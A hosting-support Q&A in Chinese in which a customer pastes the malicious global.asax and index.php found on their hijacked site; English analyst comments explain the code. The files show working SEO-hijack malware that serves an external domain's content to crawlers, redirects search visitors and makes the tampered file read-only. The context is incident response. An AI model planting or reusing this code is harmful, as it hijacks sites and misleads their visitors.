问:服务器网站(tonyuled.cn) 被global.asax劫持,删除global.asax文件后没过多久又重新出现,同时出现的还有被修改的 index.php,导致被贵司多次通知有非法信息,多次阻断网站访问,求助看看是否有什么后门或者漏洞,是否可以帮忙解决,感谢!
以下是global.asax代码:<%@ Application Language=\”C#\” %> <script runat=\”server\”>
// Analyst note: Application_Start, Application_End and Application_Error are
// empty handlers in this sample; none of them contains a statement. The
// injected behaviour sits in Session_Start and the helper methods after it.
void Application_Start(object sender, EventArgs e) {
} void Application_End(object sender, EventArgs e) {
} void Application_Error(object sender, EventArgs e) {
}
// Analyst note (Session_Start): this handler carries the hijack logic of the sample.
// ASP.NET raises Session_Start when a new session begins, so the checks below run
// on a visitor's first request rather than on every request of an existing session.
//   - data_url and redirect_url are both set to the same external host.
//   - If is_spider() returns true, the response is cleared, the bytes returned by
//     get_data(data_url) are written as the body and the response is ended: the
//     crawler receives content fetched from the external host, not the site's page.
//   - Else, if is_from_search() returns true, the visitor is redirected to
//     redirect_url (second argument true ends the current response).
//   - Otherwise nothing happens; the only statement in that branch is commented out.
// Requests with neither a matching User-Agent nor a matching Referer get the
// normal site, so a plain browser visit will not show the hijack.
// NOTE(review): the page collapsed this handler onto one line, so read literally the
// first "//" would comment out everything after it; the file on disk presumably had
// line breaks. The backslash-plus-curly-quote sequences also look like page
// extraction artifacts rather than what was on disk - confirm against the real file.
// Checks for a responder: an unexpected or recently modified global.asax in the
// application root; a response that differs when the same URL is requested in a
// fresh session with a crawler User-Agent or a search-engine Referer; outbound
// HTTP requests from the web worker process to the host named in data_url.
void Session_Start(object sender, EventArgs e) { //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); string data_url = \”http://www.zgyhk.xyz/\”; string redirect_url=\”http://www.zgyhk.xyz/\”; if (is_spider()) { HttpContext.Current.Response.Clear(); HttpContext.Current.Response.BinaryWrite(get_data(data_url)); HttpContext.Current.Response.End(); } else if(is_from_search()) { HttpContext.Current.Response.Redirect(redirect_url, true); } else { //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); } }
// Analyst note: Session_End is an empty handler in this sample.
void Session_End(object sender, EventArgs e) {
}
// is_spider: returns true when the lower-cased User-Agent of the current request
// contains any of the substrings googlebot, baiduspider, sogou, yahoo or soso
// (the list is one string split on '|'); returns false otherwise. This is plain
// substring matching, so any client sending such a User-Agent gets the same branch.
public bool is_spider() { string spider_flag = \”googlebot|baiduspider|sogou|yahoo|soso\”; string[] spider_flag_arr = spider_flag.Split(\’|\’); string user_agent=HttpContext.Current.Request.UserAgent; foreach (string tmp_flag in spider_flag_arr) { if (user_agent.ToLower().IndexOf(tmp_flag.ToLower())!=-1) { return true; } } return false; }
// is_from_search: returns false when the request has no referrer; otherwise returns
// true when the lower-cased referrer URL contains google, baidu, sogou, yahoo or
// soso, and false if none of them matches.
public bool is_from_search() { if (HttpContext.Current.Request.UrlReferrer==null) { return false; } else { string page_ref = HttpContext.Current.Request.UrlReferrer.ToString(); string search_flag = \”google|baidu|sogou|yahoo|soso\”; string[] search_flag_arr = search_flag.Split(\’|\’); foreach (string tmp_flag in search_flag_arr) { if (page_ref.ToLower().IndexOf(tmp_flag.ToLower()) != -1) { return true; } } return false; } }
// get_data: downloads the resource at url with System.Net.WebClient.DownloadData
// and returns the raw bytes. The request is made by the web server itself, so in
// network logs it shows up as an outbound connection from the server, not from
// the visitor; Session_Start passes those bytes straight into the response.
public byte[] get_data(string url) { System.Net.WebClient wc = new System.Net.WebClient(); byte[] data = wc.DownloadData(url); return data; } </script>
下面是被修改的index.php代码:<?phpset_time_limit(0);
/*
 * Analyst note: this replacement index.php serves remote content for every request.
 *   - set_time_limit(0) removes the script execution time limit.
 *   - $name is taken from $_SERVER['PHP_SELF'] (the part after the last '/') and
 *     chmod($name, 0444) sets that file read-only.
 *   - The response is declared as gb2312 HTML and the timezone is set to PRC.
 *   - $c is fetched with file_get_contents from the external host in $a, with the
 *     requesting host and path, the query string and the server name passed as the
 *     host, url and domain parameters; the fetched body is echoed unchanged, so the
 *     external host decides what each visitor sees.
 * NOTE(review): "strrpos($url1 ,'/') 1" has presumably lost a "+" in page extraction,
 * and the opening tag has lost its trailing whitespace; the backslash-plus-curly-quote
 * sequences look like extraction artifacts as well - confirm against the file on disk.
 * Checks for a responder: an index.php whose content or permissions changed
 * unexpectedly (mode 0444), and outbound HTTP requests from PHP to the host in $a.
 */
$url1 = $_SERVER[\’PHP_SELF\’]; $name= substr($url1 ,strrpos($url1 ,\’/\’) 1 );chmod($name,0444);header(\”Content-Type: text/html;charset=gb2312\”);date_default_timezone_set(\’PRC\’);$a = \”http://www.zgyhk.xyz/\”;$b = \”http://\”.$_SERVER[\’HTTP_HOST\’].$_SERVER[\’PHP_SELF\’];$c = file_get_contents($a.\”/index.php?host=\”.$b.\”&url=\”.$_SERVER[\’QUERY_STRING\’].\”&domain=\”.$_SERVER[\’SERVER_NAME\’]);echo $c;?>
,服务器网站被global.asax劫持
答:您好,这种情况是网站程序存在漏洞,被黑客上传了后门程序,对方可以通过后门对空间里的文件任意增加、修改,所以仅删除global.asax后,文件还会再次出现。我司并不熟悉您的程序代码,请联系程序开发商协助查找并清除后门、修复漏洞,非常感谢您长期对我司的支持!